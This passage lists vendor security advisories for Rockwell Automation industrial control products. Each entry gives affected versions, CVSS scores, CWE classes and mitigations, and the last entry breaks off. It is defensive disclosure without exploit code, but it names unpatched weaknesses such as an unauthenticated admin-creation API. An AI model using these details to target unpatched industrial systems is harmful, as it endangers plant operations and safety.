CWE: 200 - Exposure of Sensitive Information to an unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2020-11656 IMPACT

The affected product utilizes SQLite, which contains a use after free vulnerability in the ALTER TABLE implementation, which was demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 1395 - Dependency on Vulnerable third-party Component
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1718 | 5380/5580 Denial-of-Service Vulnerability
Published Date:
January 28, 2025
Last Updated:
January 30, 2025
CVE IDs:
CVE-2025-24478
CVSS Scores (v3.1):
6.5
CVSS Scores (v4.0):
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product(s)

First Known in Software Version

Corrected in Software Version

GuardLogix 5580

Compact GuardLogix 5380 SIL3

V33.011

V33.017, V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24478 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability could allow a remote, non-privileged user to send malicious requests resulting in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 6.5
CVSS 3.1 Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector:  CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-755: Improper Handling of Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Restrict Access to the task object via CIP Security and Hard Run.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1719 | FactoryTalk® View Machine Edition Multiple Vulnerabilities
Published Date:
January 28, 2025
Last Updated:
February 05, 2025
CVE IDs:
CVE-2025-24479, CVE-2025-24480
CVSS Scores (v3.1):
8.4, 9.8
CVSS Scores (v4.0):
8.6, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Version(s)

Corrected in Software Version

FactoryTalk® View Machine Edition

CVE-2025-24479

< V15

V15 and Patch for V12, V13, V14 (AID 1152309)

CVE-2025-24480

 

< V15

 

V15 and patch for V12, V13, V14 (AID 1152571)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24479 IMPACT

A Local Code Execution Vulnerability exists in the product and version listed above. The vulnerability is due to a default setting in Windows and allows access to the Command Prompt as a higher privileged user.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24480 IMPACT

A Remote Code Execution Vulnerability exists in the product and version listed above. The vulnerability is due to lack of input sanitation and could allow a remote attacker to run commands or code as a high privileged user.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') & CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         CVE-2025-24479:

·         Upgrade to V15.00 or apply patch in AID 1152309

·         Control physical access to the system

·         CVE-2025-24480:

·         Upgrade to V15.00 or apply patch in AID 1152571

·         Protect network access to the device

·         Strictly constrain the parameters of invoked functions

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1720 | FactoryTalk® View Site Edition Multiple Vulnerabilities
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-24481, CVE-2025-24482
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Version(s)

Corrected in Software Version

FactoryTalk® View SE

CVE-2025-24481

< V15.0

V15.0, and patch for v14 (AID 1152306)

CVE-2025-24482

< V15.0

V15.0, and patches for V12, V13, V14 (1152304)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24481 IMPACT

An Incorrect Permission Assignment Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect permissions being assigned to the remote debugger port and can allow for unauthenticated access to the system configuration.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-732:  Incorrect Permission Assignment for Critical Resource
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24482 IMPACT

A Local Code Injection Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect default permissions and allows for DLLs to be executed with higher level permissions.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-94: Improper Control of Generation of Code ('Code Injection')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For CVE-2025-24481:

·         Upgrade to V15 or apply patch. Answer ID 1152306

·         Protect physical access to the workstation

·         Restrict access to port 8091 at the network or workstation

·         For CVE-2025-24482:

·         Upgrade to V15 or apply patch. Answer ID 1152304.

·         Check the environment variables (PATH), and make sure FactoryTalk® View SE installation path (C:\Program Files (x86)\Common Files\Rockwell) is before all others

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1716 | KEPServer Denial-of-Service Vulnerability Found During Pwn2Own Competition
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2023-3825
Products:
KEPServer
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Versions

Fixed Version

KEPServer

CVE-2023-3825

6.0 - 6.14.263

6.15

VULNERABILITY DETAILS

Rockwell Automation received a report from PTC, a strategic partner of Rockwell Automation, regarding this vulnerability discovered by Security Researchers of Claroty Team82 during the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-3825 IMPACT

KEPServerEX Versions 6.0 to 6.14.263 are vulnerable to being made to read a recursively defined object that leads to uncontrolled resource consumption. KEPServerEX uses OPC UA, a protocol which defines various object types that can be nested to create complex arrays. It does not implement a check to see if such an object is recursively defined, so an attack could send a maliciously created message that the decoder would try to decode until the stack overflowed and the device crashed.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-400: Uncontrolled Resource Consumption
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         NVD - CVE-2023-3825

·         PTC KEPServerEX | CISA

·         CS405439 - Security vulnerabilities identified in PTC Kepware products - November 2023

High
SD1717 | PowerFlex® 755 Credential Exposure Vulnerability
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-0631
Products:
PowerFlex 755
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Version(s)

Fixed Version

PowerFlex® 755

<=16.002.279

v20.3.407

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0631 IMPACT

A Credential Exposure Vulnerability exists in the above-mentioned product and version. The vulnerability is due to using HTTP resulting in credentials being sent in clear text.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-319: Cleartext Transmission of Sensitive Information
Known Exploited Vulnerability (KEV) database: None

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1714 | PowerMonitor™ 1000 Remote Code Execution and denial-of-service Vulnerabilities via HTTP protocol
Published Date:
December 17, 2024
Last Updated:
December 17, 2024
CVE IDs:
CVE-2024-12371 , CVE-2024-12372 , CVE-2024-12373
CVSS Scores (v3.1):
9.8, 9.8, 9.8
CVSS Scores (v4.0):
9.3, 9.3, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: December 17, 2024

Last updated: December 17, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.3/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Products

Affected firmware revision

Corrected in firmware revision

PM1k 1408-BC3A-485

<4.020

4.020

PM1k 1408-BC3A-ENT

<4.020

4.020

PM1k 1408-TS3A-485

<4.020

4.020

PM1k 1408-TS3A-ENT

<4.020

4.020

PM1k 1408-EM3A-485

<4.020

4.020

PM1k 1408-EM3A-ENT

<4.020

4.020

PM1k 1408-TR1A-485

<4.020

4.020

PM1k 1408-TR2A-485

<4.020

4.020

PM1k 1408-EM1A-485

<4.020

4.020

PM1k 1408-EM2A-485

<4.020

4.020

PM1k 1408-TR1A-ENT

<4.020

4.020

PM1k 1408-TR2A-ENT

<4.020

4.020

PM1k 1408-EM1A-ENT

<4.020

4.020

PM1k 1408-EM2A-ENT

<4.020

4.020

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. The following vulnerabilites were reported by Vera Mens of Claroty Research - Team82. 

 

CVE-2024-12371 IMPACT

A device takeover vulnerability exists in the affected product. This vulnerability allows configuration of a new Policyholder user without any authentication via API. Policyholder user is the most privileged user that can perform edit operations, creating admin users and performing factory reset.

CVSS 3.1 Base Score: 9.8/10 

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 

CSVV 4.0 Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE-420: Unprotected Alternate Channel

 

CVE-2024-12372 IMPACT

A denial-of-service and possible remote code execution vulnerability exists in the affected product. The vulnerability results in corruption of the heap memory which may compromise the integrity of the system, potentially allowing for remote code execution or a denial-of-service attack.

CVSS 3.1 Base Score: 9.8/10  

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 

CSVV 4.0 Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE-122: Heap-based Buffer Overflows

 

CVE-2024-12373 IMPACT

A denial-of-service vulnerability exists in the affected product. The vulnerability results in a buffer-overflow, potentially causing denial-of-service.

CVSS 3.1 Base Score: 9.8/10  

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 

CSVV 4.0 Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

·       Security Best Practices

High
SD1713 | Multiple Code Execution Vulnerabilities in Arena®
Published Date:
December 04, 2024
Last Updated:
December 19, 2024
CVE IDs:
CVE-2024-11155 , CVE-2024-11156 , CVE-2024-11158 , CVE-2024 -12130 , CVE-2024-11157, CVE-2024-12672, CVE-2024-11364, CVE-2024-12175
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Revision Number: 2

CVSS Score: v3.1: 7.8, v4.0 8.5

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Software Version

Corrected in Software Version

Software - Arena

 

CVE-2024-11155

All versions 16.20.00 and prior

V16.20.06 and later

CVE-2044-11156

 

All versions 16.20.03 and prior

V16.20.06 and later

CVE-2024-11158

 

All versions 16.20.00 and prior

V16.20.06 and later

CVE-2024 -12130

All versions 16.20.05 and prior

V16.20.06 and later

 

CVE-2024-11157

 

All versions 16.20.06 and prior

V16.20.07 and later

 

CVE-2024-12175

 

All versions 16.20.06 and prior

V16.20.07 and later

Software – Arena® 32 bit

CVE-2024-12672

 

All versions 16.20.07 and prior

n/a – see mitigations

CVE-2024-11364

 

All versions 16.20.06 and prior

V16.20.07 and later 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by ZDI (Zero Day Initiative).

CVE-2024-11155 IMPACT

A “use after free”  code execution vulnerability exists in the affected products that could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-416 Use After Free

Known Exploited Vulnerability (KEV) database: No

CVE-2024-11156 IMPACT

An “out of bounds write”  code execution vulnerability exists in the affected products that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-787 Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-11158 IMPACT

An “uninitialized variable”  code execution vulnerability exists in the affected products that could allow a threat actor to craft a DOE file and force the software to access a variable before it being initialized. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-665 Improper Initialization

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12130 IMPACT

An “out of bounds read” code execution vulnerability exists in the affected products that could allow a threat actor to craft a DOE file and force the software to read beyond the boundaries of an allocated memory. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-11157

A third-party vulnerability exists in the affected products that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.  

CVSS 3.1 Base Score: 7.8 

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-787 Out-of-bounds Write  
Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12672

A third-party vulnerability exists in the affected products that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. 

CVSS 3.1 Base Score: 7.8 

CVSS 3.1 Vector:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-1395 Dependency on third-party Component

Known Exploited Vulnerability (KEV) database: No 

 

CVE-2024-11364

Another “uninitialized variable” code execution vulnerability exists in the affected products that could allow a threat actor to craft a DOE file and force the software to access a variable prior to it being initialized. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-1395 Dependency on third-party Component

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12175

Another “use after free” code execution vulnerability exists in the affected products that could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-416 Use After Free

Known Exploited Vulnerability (KEV) database: No

 

Mitigations and Workarounds
Customers using the affected software are encouraged to apply these risk mitigations, if possible.

  •       Do not load untrusted Arena® model files.
  •       Hold the control key down when loading files to help prevent the VBA file stream from loading.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1712 | Third Party Remote Code Execution Vulnerability in Verve Reporting
Published Date:
November 14, 2024
Last Updated:
November 14, 2024
CVE IDs:
CVE-2024-37287
CVSS Scores (v3.1):
7.2
CVSS Scores (v4.0):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: 11/14/24

Last updated: 11/14/24

Revision Number: 1.0

CVSS Score: v3.1: 6.8/10, v4.0: 8.4/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product Affected Version(s) Corrected in Software Revision
Verve Reporting <v1.39 V1.39

VULNERABILITY DETAILS 

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-37287 IMPACT

Verve Reporting utilizes Kibana which contains a remote code execution vulnerability that allows an attacker with access to ML and Alerting connecting features as well as write access to internal ML to trigger a prototype pollution vulnerability, which can ultimately lead to arbitrary code execution. The code execution is limited to the container.

CVSS Base Score v3.1: 7.2/10

CVSS Vector CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.6/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability. 

  1. Restrict Access to Built-in Verve Account
    • Access to the built-in "verve" account should be limited to only administrators who need to perform administrative functions and should only be used for administrative purposes. Separate accounts should be used for day-to-day functions.
    • Change the password for the built-in "verve" account if it has been shared.
  2. Restrict Privileges for Other Accounts
    • Verve Reporting comes with built-in roles to simplify the delegation of user permissions. Assigning a user the following two roles will allow them access to most Verve Reporting features (excluding user administration), but will not give them permission to execute this vulnerability.
      • all-all
      • feature-all-all
  3. Disable Machine Learning
    • Machine learning can be disabled in the Elasticsearch configuration override. Contact Verve support for assistance if needed.
      1. Connect to the Reporting server via SSH or terminal.
      2. Copy the Elasticsearch configuration override to the working directory.
        1. docker exec $(docker ps --filter "name=Reporting_elasticsearch" --format "{{ .ID }}") cat /usr/share/elasticsearch/config-templates/elasticsearch.override.yml > elasticsearch.override.yml
      3. Add the following line and save.
        1. xpack.ml.enabled: false
      4. Disable Verve Reporting from the Verve Software Manager.
      5. Update the Elasticsearch configuration override.
        1. docker config rm elasticsearchymloverride 
          docker config create elasticsearchymloverride ./elasticsearch.override.yml
      6. Enable Verve Reporting from the Verve Software Manager and confirm that the application starts and "Machine Learning" is no longer listed in the main navigation bar under Analytics.
      7. Delete the copy of the Elasticsearch configuration override. 
        1. rm elasticsearch.override.yml

 

High
SD1711 | Input Validation Vulnerability exists in Arena® Input Analyzer
Published Date:
November 14, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-6068
Products:
Arena® Input Analyzer
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 11/14/2024

Revision Number: 1.0

CVSS Score: 3.1: 7.3/10, 4.0: 7.0/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Software Version

Corrected in Software Version

Arena® Input Analyzer


16.20.03 and prior

16.20.04

VULNERABILITY DETAILS

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6068 IMPACT

A memory corruption vulnerability exists in the affected products when parsing DFT files.  Local threat actors can exploit this issue to disclose information and to execute arbitrary code. To exploit this vulnerability a legitimate user must open a malicious DFT file.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector:  CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE 1284 Improper Validation of Specified Quantity in Input
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

High
SD1709 | FactoryTalk View ME Remote Code Execution Vulnerability via Project Save Path
Published Date:
November 12, 2024
Last Updated:
November 12, 2024
CVE IDs:
CVE-2024-37365
Products:
FactoryTalk View Machine Edition
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: November 12th, 2024

Last updated: November 12th, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.3/10, v4.0: 7.0/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve our customer’s business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Revision

Corrected in Software Revision

FactoryTalk View ME

>= V14; when using default folders privileges

V15

 

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

·         To enhance security and prevent unauthorized modifications to HMI project files, harden the Windows OS by removing the INTERACTIVE group from the folder’s security properties.

·         Add specific users or user groups and assign their permissions to this folder using the least privileges principle. Users with read-only permission can still test run and run the FactoryTalk View ME Station.

·         Guidance can be found in FactoryTalk View ME v14 Help topic: “HMI projects folder settings”. It can be opened through FactoryTalk View ME Studio menu “help\Contents\FactoryTalk View ME Help\Create a Machine Edition application->Open applications->HMI project folder settings”.   Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-37365 IMPACT

A remote code execution vulnerability exists in the affected product. The vulnerability allows users to save projects within the public directory allowing anyone with local access to modify and/or delete files. Additionally, a malicious user could potentially leverage this vulnerability to escalate their privileges by changing the macro to execute arbitrary code.

CVSS 3.1 Base Score: 7.3/10 

CVSS Vector: CVSS: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

Critical
SD1710 | FactoryTalk® Updater Multiple Vulnerabilities
Published Date:
November 12, 2024
Last Updated:
November 12, 2024
CVE IDs:
CVE-2024-10943, CVE-2024-10944, CVE-2024-10945
Products:
FactoryTalk Updater
CVSS Scores (v3.1):
9.1, 8.4, 7.3
CVSS Scores (v4.0):
9.1, 7.1, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: 11/12/2024
Last Updated: 11/12/2024
Revision Number: 1.0
CVSS Score: Multiple, see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

